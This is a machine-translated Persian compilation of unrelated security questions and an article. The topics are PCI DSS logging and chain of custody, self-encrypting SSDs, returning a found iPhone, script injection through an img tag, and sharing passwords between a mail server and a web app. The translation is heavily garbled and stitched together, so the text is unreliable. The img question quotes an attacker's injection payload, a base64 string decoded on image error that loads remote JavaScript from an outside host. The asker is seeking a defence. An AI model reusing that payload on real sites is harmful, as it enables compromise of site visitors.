pci dss – داده های حساس شناسایی، محتویات و ریشه کن کردن – زنجیره نگهداری

برای ایجاد یک دیدگاه از اطلاعات حساس در سازمان، یک فعالیت کشف بسیج شده است. علاوه بر ایجاد یک دیدگاه، هدف ابتکار این است که همچنین سیاست ها، فرآیندها و روش های مربوط به حاوی و ریشه کن کردن اطلاعات حساس در صورت لزوم را اطلاع دهد.

علاوه بر این، همچنین باید به حداقل رساندن خطرات و تاثیرات نقض کمک کند یک رخ می دهد.

در طول مرحله کشف اطلاعات حساس در مکان های مختلف شناسایی شد. این شامل اطلاعات قابل شناسایی شخصی، اطلاعات کارت شناسان، هویت های اجتماعی و غیره

قبل از ریشه کن کردن داده ها، ما گزینه هایی را برای پشتیبانی از توانایی تجزیه و تحلیل داده ها بررسی می کنیم. به همین ترتیب، اگر تجزیه و تحلیل بیانگر اکستروژن داده باشد، ما می خواهیم در فعالیت های قانونی فعالیت داشته باشیم.

در بررسی تنظیمات سیستم، ما دریافتیم که سیاهههای مربوط به ناکافی بودن سیستم به لحاظ تاریخی نادرست پیکربندی شده است. به عنوان مثال، در یک سناریو، سیاهههای مربوط بومی ویندوز تنها برای چند روز ادامه می یابد.

با توجه به فقدان logs قابل اطمینان و اطمینان از زنجیره نگهداری، شیوه های توصیه شده چیست؟ آیا موارد مربوط به انطباق وجود دارد مانند PCI-DSS؟

چگونه SSD با SED رمزنگاری و رمزگشایی داده ها را انجام می دهد؟

هنگامی که شما وارد می شوید و شما می خواهید یک فایل را ذخیره کنید، SED داده ها را رمزگذاری می کند، اما فرایند رمزگذاری دقیقا کجاست؟ آیا SED قبل از اینکه به دیسک برسد، داده ها را در حافظه رمزگذاری می کند؟ یا پس از اتمام نوشتن، آنها یک بلوک یا صفحه را دوباره روی SSD رمزگذاری می کنند؟

اگر شما آیفون یا تلفن هوشمند را از دست داده اید، چه کاری انجام دهید؟

گوشی های هوشمند همیشه گم شده اند. من خیلی مطمئن هستم که خواهر من سه ماهه دوم و سومین روز هر ماه را از دست می دهد. ما قبلا در مورد آنچه که باید انجام دهیم اگر شما تلفن هوشمند خود را از دست بدهی، بگذارید دیدگاه دیگری پیدا کنیم: اگر شما گوشی هوشمند شخصی خود را پیدا کردید و می خواهید آن را به آنها بازگردانید.

مرتبط: [19659003

ترک آن از کجا یافتید

اکثر مردم خیلی زود متوجه می شوند که گوشی خود را از دست داده اند و اولین کاری که می کنند این است که به مکان های اخیر بازگردانده شوند

اگر شما یک تلفن در یک کافیسپ، نوار، کتابخانه یا دیگر مکان های عمومی پیدا کنید، آن را در جایی که شما آن را پیدا کرده اید. شما هنوز هم می توانید برخی از مراحل دیگر در این مقاله را انجام دهید، اما سعی نکنید شرلوک هولمز آن را به مالک برگرداند. آنها به دنبال آن خواهند بود و مگر اینکه شما آنها را بدانید، احتمال اینکه شما آنها را پیدا کنید قبل از بازگشت به محل که تلفن خود را ترک کرده اید، اساسا صفر است.

اگر یک تلفن در نوع خاصی از حمل و نقل عمومی پیدا کنید، چیزها کمی پیچیده هستند. بعضی از خدمات متمرکز شده اند گم شده و پیدا شده است که مردم را آسان می کند برای بازگشت به کار، در حالی که دیگران جعبه مقوا در هر ایستگاه است که هرگز نور روز را نمی بیند. از قضاوت خود در مورد اینکه آیا آن را در آن قرار دهید یا بعد از آن چند روز قبل از ارسال آن به پلیس استفاده کنید، استفاده کنید.

اگر آیفون را در خیابان پیدا کنید، همه شرط بندی ها خاموش است. شانس صاحب آن در آنجا دروغ نمی گوید و مطمئنا قبل از آن که چندین بار در آن ایستاد – بنابراین آن را انتخاب کنید و آن را بخوانید.

سعی کنید با مادر خود تماس بگیرید

زمانی که مردم Nokiaphonephone خود را از دست دادند بازگشت آن آسان بود: شما فقط از طریق تماس های خود رفت و به نام "مادر"، "خانه"، و یا هر گونه دیگر به دنبال تماس بود وجود دارد. در حال حاضر، با FaceID، TouchID، کد های عبور و قفل الگو، شما نمی توانید فقط از طریق مخاطبین کسی پیمایش کنید، اما این بدان معنا نیست که شما ممکن است قادر به تماس با مادر خود نباشید.

به طور پیش فرض، سیری و گوگل دستیار زمانی که تلفن قفل شده است، برای کار تنظیم می شود این بدان معنی است که شما هنوز هم می توانید سعی کنید و تماس مادر کسی حتی اگر شما نمی توانید به تماس های خود را دریافت کنید.

تلفن را بردارید و Siri یا Google Assistant را فعال کنید. در بیشتر موارد، این شامل نگه داشتن دکمه صفحه اصلی است، اگرچه آیفون X نیاز به نگه داشتن دکمه Power دارد. هنگامی که دستیار صوتی صفحه نمایش ظاهر می شود، «تماس با مادر»، «تماس با منزل» یا هر چیز دیگری که فکر می کنید ممکن است کار کند.

بر روی آی فون، گزینه دیگری نیز وجود دارد. شما از سیری "Who owns this phone؟" – و اگر یک ارتباط با مالک وجود داشته باشد، آن نمایش داده خواهد شد.

شناسه پزشکی را بر روی یک آیفون بررسی کنید

یکی دیگر از ویژگی های آیفون است که حتی زمانی که دستگاه قفل شده است کار می کند، شناسه پزشکی است. این طراحی شده است به طوری که شما می توانید شرایط پزشکی، آلرژی را اضافه کنید، اینکه آیا شما اهدا کننده عضو هستید، و بعد از جزئیات تماس با خانواده برای پاسخ اضطراری. این آخرین نکته ای است که ما علاقه مند هستیم.

مرتبط: نحوه نمایش اطلاعات پزشکی اضطراری بر روی آی فون خود را

سعی کنید وارد سیستم شوید. هنگامی که شما موفق به ضربه زدن، ضربه بزنید اورژانس. اگر شناسه پزشکی فعال شده باشد، خواهید دید که در پایین سمت چپ نوشته شده است. اگر آن را فعال نکنید، نمی توانید.

روی "ID پزشکی" ضربه بزنید و هر جزئیاتی را که مالک اضافه کرده اید را مشاهده خواهید کرد. شما می توانید ببینید 28 ساله، اهدا کننده ارگان و اطلاعات تماس پدرم هستم

با Next The Kin تماس بگیرید و به آنها اطلاع دهید که آیفون را پیدا کرده اید.

Keep It Charged [19659005] یافتن آیفون من و پیدا کردن دستگاه من واقعا ابزار عالی برای پیدا کردن تلفن های از دست رفته است. آنها نه تنها آخرین مکان دستگاه را نشان می دهند، بلکه می توانید از آنها برای ارسال پیام به تلفن استفاده کنید. با این حال، برای کار آنها، دستگاه باید روشن شود؛ این به این معنی است که شما نیاز به صرفه جویی در عمر باتری دارید.

ساده ترین راه این کار این است که فقط آن را به یک شارژر وصل کنید. به این ترتیب نمیتوان از آب خارج شد. اگر گوشی شما همان مدل و مدل است، یا شما یک کابل قدیمی در اطراف دارید، همه چیز خوب است. اگر از یک شارژر متفاوت استفاده می کند، یک شارژر USB-C می گویند که هنوز فوق العاده رایج نیست، پس همه چیز کمی پیچیده است.

اگر شما می توانید ارزان قیمت کابل قرض گرفتن یا خریداری کنید، این کار را انجام دهید، اما این شروع می شود برای تبدیل شدن به مقدار زیادی از کار. هیچ کس انتظار ندارد شما ساعت ها و پول خود را صرف تلاش برای بازگشت تلفن کنید.

در عوض، بهترین کار این است که تلفن را چند ساعت (تا زمانی که عمر باتری آن کافی است) بگذارید تا شخص را فرصتی برای تحقق بخشیدن به آن وجود دارد و از استفاده از Find My iPhone یا یافتن دستگاه من استفاده کنید. اگر گوشی را در حالت گم شده قرار ندهید، آن را خاموش کنید و چند ساعت بعد دوباره امتحان کنید. این کار را ادامه دهید تا زمانی که گوشی خود را در حالت گمشده قرار دهید یا از باتری خارج شود.

اگر همه چیز با شکست مواجه شود، به پلیس بفرستید

بعد از یک یا دو روز، اگر شخص با شما تماس نگرفته باشد آیفون من و یا یافتن دستگاه من، پس از آن زمان آن را به پلیس است. آنها عموما موظفند سعی کنند آن را به مالک برگردانند و به منابع دسترسی داشته باشند مانند اینکه بتوانند ارائه دهندگان سلول را به اطلاعات شخصی تبدیل کنند- که شما نیستید. سرانجام به نزدیکترین ایستگاه رفته و آن را رها کنید.


به طور حاد، اکثر افرادی که می شناسم که آیفون خود را از دست داده اند، آن را به آنها بازگردانده اند. با استفاده از ابزار Find My iPhone یا یافتن دستگاه من آسان است و فقط در گوشیهای هوشمند قفل شده ارزش زیادی وجود ندارد.

php – JS به پایگاه داده با استفاده از img

چگونه ما بهترین ها را جلوگیری از img تزریق اسکریپت به پایگاه داده هایمان تزریق کنیم؟

اخیرا یک مورد دریافت کردم که در آن این تقلب کننده از شناسه تصویر استفاده می کند که با کد 64 پایه ارزشمند است و با استفاده از رمزگشایی atob برای اجرای اسکریپت خود در سرور پایان ما

من به طور عمدی عملکرد تابع atob را به named_function تغییر دادم "در اسکریپت زیر، چون باعث ایجاد یک iframe در این سایت می شود.

این اسکریپت است. [19659005] img src = /
  id = dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vbHjlY2lwZXMuY2YvaiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs
  در صورت بروز خطا، آن را به یک وبسایت با بارهای JS منتهی می کند (19459004) named_function (this.id))>

.
با استفاده از socket.io، به نظر می رسد که یک اسکریپت انعطاف پذیر در iframe برای ایجاد وب سایت ها ایجاد کند.

راه حل فعلی من این است که تنها اجازه تصویر با src با داشتن پسوند تصویر را داشته باشد.

آیا کسی ایده بهتر دارد؟

با تشکر

گذرواژه – پیوند سرور ایمیل با پایگاه داده برنامه

من یک برنامه وب در node.js دارم که توسط یک پایگاه داده MongoDB که داده های کاربر را ذخیره می کند، پشتیبانی می کند. من می خواهم کاربران خود را یک حساب ایمیل بگذارم، بنابراین یک سرور ایمیل با استفاده از Postfix تنظیم کردم ، dovecot، و غیره … مشکل من این است که من می خواهم دو پایگاه داده کاربر را پیوند دهم. در حال حاضر من postfix و dovecot پیکربندی شده برای استفاده از کاربران مجازی ذخیره شده در پایگاه داده MySQL (واقعا MariaDB)، و این کار خوب است (من می توانم دسترسی و ارسال ایمیل بر روی IMAP و غیره …). با این حال، من می خواهم که کاربران خود بتوانند از همان رمز عبور برای IMAP برای ورود به برنامه وب استفاده کنند. من خوشحالم که یک API PHP را برای ایجاد کاربران در سرور پست الکترونیکی و غیره بنویسید، اما مسئله من این است که چگونه رمز عبور را مدیریت کنید. همانطور که می بینم، دو گزینه وجود دارد؛

  1. من می توانم کلمه عبور متن ساده را از سرور برنامه های وب خود به سرور پست الکترونیکی خود منتقل کنم زمانی که یک کاربر ثبت نام یا تغییر رمز عبور. پس از آن، به طور واضح در سرور پست الکترونیکی هشدار داده می شود و در پایگاه داده ذخیره می شود و در سرور درخواست شده ذخیره می شود و در پایگاه داده MongoDB ذخیره می شود. این باعث می شود که من اشتباه کنم – رمز عبور متن ساده را با دو بار تکرار رمز عبور ارسال کنم
  2. من می توانم رمزهای عبور هشدار را از سرور برنامه به سرور ایمیل انتقال دهم و آنها را دوباره ذخیره کنم بدون . باز هم، این احساس بسیار خجالتی است، از دیدگاه سرور ایمیل، گذرنامه ها را می پذیرد و آنها را در متن واضح ذخیره می کنند.

آیا گزینه های دیگری برای اجازه دادن به کاربران من برای ورود به هر دو سرور با همان اعتبار وجود دارد؟ چه مسائل امنیتی با دو گزینه ای که از بالا مطرح کردم وجود دارد؟